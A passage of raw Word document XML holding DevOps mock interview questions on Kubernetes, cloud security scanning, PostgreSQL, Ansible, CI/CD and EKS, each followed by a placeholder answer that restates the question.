        <w:t>A: A strong answer should directly address the Readiness Probe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Readiness Probe. How is it different from the Liveness Probe?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. If an application gets stuck or becomes unhealthy, does Kubernetes execute a kubectl command to restart it? If not, how is the restart triggered?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Container Restart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Container Restart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an application gets stuck or becomes unhealthy, does Kubernetes execute a kubectl command to restart it? If not, how is the restart triggered?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How does kubelet restart a failed container? Does kubelet communicate directly with the container runtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Container Runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Container Runtime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kubelet restart a failed container? Does kubelet communicate directly with the container runtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the complete flow when an application crashes: Application to Kubelet to API Server to etcd to Controller Manager to new Pod or restart?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Failure Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Failure Flow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flow when an application crashes: Application to Kubelet to API Server to etcd to Controller Manager to new Pod or restart?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What do you mean by content correlation in the context of Kubernetes or observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content Correlation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Content Correlation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 you mean by content correlation in the context of Kubernetes or observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 64 - Security Database Ansible CI/CD Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Your application is written in which language? Is it Java, Python, Node.js, or a mix of technologies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Application Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Application Stack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application is written in which language? Is it Java, Python, Node.js, or a mix of technologies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Have you deployed Sentinel antivirus? Is it scanning the Kubernetes cluster, worker nodes, or container applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Sentinel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deployed Sentinel antivirus? Is it scanning the Kubernetes cluster, worker nodes, or container applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you integrate Sentinel with your applications? How does it work with GKE/Kubernetes, and when is the image scanned?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Sentinel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integrate Sentinel with your applications? How does it work with GKE/Kubernetes, and when is the image scanned?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. After deployment, how do you monitor the infrastructure? How is Prisma or Cloud Security used, and what kind of misconfigurations does it detect, such as excessive IAM permissions like Owner role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud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deployment, how do you monitor the infrastructure? How is Prisma or Cloud Security used, and what kind of misconfigurations does it detect, such as excessive IAM permissions like Owner role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. You mentioned PostgreSQL, MySQL, and MongoDB. Are you working as a DBA?</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mentioned PostgreSQL, MySQL, and MongoDB. Are you working as a DBA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What database-related activities have you performed, such as database migration, role management, cluster creation, backup, and restore?</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database-related activities have you performed, such as database migration, role management, cluster creation, backup, and restore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you take a backup of a PostgreSQL database?</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a PostgreSQL database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you restore a PostgreSQL backup?</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restore a PostgreSQL backup?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Have you performed backup and restore activities yourself?</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performed backup and restore activities yourself?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What database migration have you done, for example AWS to GCP migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Database Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Database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database migration have you done, for example AWS to GCP migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do you identify long-running SQL queries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Database Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Database 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identify long-running SQL queries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How do you optimize slow-running SQL queries using indexing, EXPLAIN ANALYZE, and query tuning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Database Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Database 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optimize slow-running SQL queries using indexing, EXPLAIN ANALYZE, and query tuning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. You mentioned Terraform and Ansible. Have you worked on Ansible?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mentioned Terraform and Ansible. Have you worked on Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What was the purpose of using Ansible, such as VM patching, configuration management, or report generation?</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purpose of using Ansible, such as VM patching, configuration management, or report generation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Which Ansible modules have you used, such as yum, apt, service, systemd, shell, command, copy, template, file, setup, and lineinfile?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Ansible modules have you used, such as yum, apt, service, systemd, shell, command, copy, template, file, setup, and lineinfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Can you explain your Ansible playbook, including tasks, inventory, handlers, variables, and execution flow?</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your Ansible playbook, including tasks, inventory, handlers, variables, and execution flow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Can you explain the CI/CD process and how it works between Development, QA, DevOps, Security, and Production?</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the CI/CD process and how it works between Development, QA, DevOps, Security, and Production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. When developers commit code, what happens next?</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developers commit code, what happens next?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Do you perform any scanning after every code commit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security Scanning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perform any scanning after every code commit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. Which tool do you use for code scanning, such as SonarQube or SonarCloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security Scanning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tool do you use for code scanning, such as SonarQube or SonarCloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. What does SonarQube check, including bugs, vulnerabilities, code smells, code duplication, and Quality Gates?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SonarQube</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SonarQube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SonarQube check, including bugs, vulnerabilities, code smells, code duplication, and Quality Gates?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. What happens if SonarQube Quality Gate fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SonarQube</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SonarQube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SonarQube Quality Gate fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. After SonarQube, what are the next stages in the CI/CD pipeline, such as build, container image creation, image scanning, push to registry, and deployment to Dev/QA/Prod?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SonarQube, what are the next stages in the CI/CD pipeline, such as build, container image creation, image scanning, push to registry, and deployment to Dev/QA/Prod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 65 - EKS Kubernetes DevOps Operations Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Tell me something about yourself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the General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something about yourself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. You have around 7 years of experience, right?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the General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have around 7 years of experience, right?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Have you worked on GCP, AWS, and Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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GCP, AWS, and Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Have you worked on on-prem servers or only on cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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on-prem servers or only on cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Have you worked on EKS?</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EKS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Have you launched an EKS cluster?</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launched an EKS cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Did you create the EKS cluster using Terraform, CloudFormation, or manually?</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create the EKS cluster using Terraform, CloudFormation, or manually?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Suppose an application is down. How will you identify the root cause?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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an application is down. How will you identify the root cause?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is the difference between ADD and COPY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ADD and COPY in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is the difference between docker build and docker commit?</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docker build and docker commit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How can you minimize the Docker image size?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can you minimize the Docker image size?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What is a Headless Service?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Headless Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the default NodePort range?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default NodePort range?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. If NodePort gives only a port, how do you access the application? What IP do you use?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NodePort gives only a port, how do you access the application? What IP do you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. If there are 10-20 worker nodes, which node IP will you choose?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there are 10-20 worker nodes, which node IP will you choose?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. If the Load Balancer is down, how will you troubleshoot the application using NodePort?</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Load Balancer is down, how will you troubleshoot the application using NodePort?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How do you expose a service outside the Kubernetes cluster?</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service outside the Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Which Ingress Controller are you using?</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Ingress Controller are you using?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. How do you install or setup the NGINX Ingress Controller in GKE?</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install or setup the NGINX Ingress Controller in GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. You already have a GKE cluster. How will you configure an Ingress Controller?</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already have a GKE cluster. How will you configure an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Why do we use an Ingress Controller?</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an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. If NGINX Ingress is deprecated, what will you use in the future?</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NGINX Ingress is deprecated, what will you use in the future?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How will you expose applications after moving away from NGINX Ingress?</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will you expose applications after moving away from NGINX Ingress?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How do you expose an application using a Kubernetes Service?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an application using a Kubernetes Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. Why do we use Namespaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
